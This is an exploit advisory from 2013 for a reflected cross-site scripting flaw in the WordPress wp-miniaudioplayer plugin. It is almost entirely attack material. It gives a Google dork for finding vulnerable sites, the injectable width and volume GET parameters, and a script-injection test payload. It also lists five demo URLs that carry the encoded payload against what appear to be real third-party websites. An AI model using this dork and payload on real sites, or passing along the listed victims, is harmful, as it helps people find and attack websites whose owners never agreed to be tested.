#######################################################################
# Exploit Title :  Wordpress wp miniaudioplayer Cross site scripting
Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork: : inurl:/wp-content/plugins/wp-miniaudioplayer
#
# Date: 2013/09/24
#
# all Version
#
# Vendor Homepage : http://wordpress.org
#
# Software link :
http://downloads.wordpress.org/plugin/wp-miniaudioplayer.1.3.8.zip
#
# Tested on: Windows
#
##############
#
# Location:
site/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=[xss]&volume=[xss]#
#
# metod : Get
#
# Script for Test : "/><script>alert(1);</script>
#
##############
##############
# Demo:
#
#
http://www.alisonstewart.net/wp-content//plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.adogforsaul.org/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.blondandblondandblond.com/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.navafilm.com/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.riverlifechurch.tv/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
##############
#
# Discovered By : ACC3SS
#
##############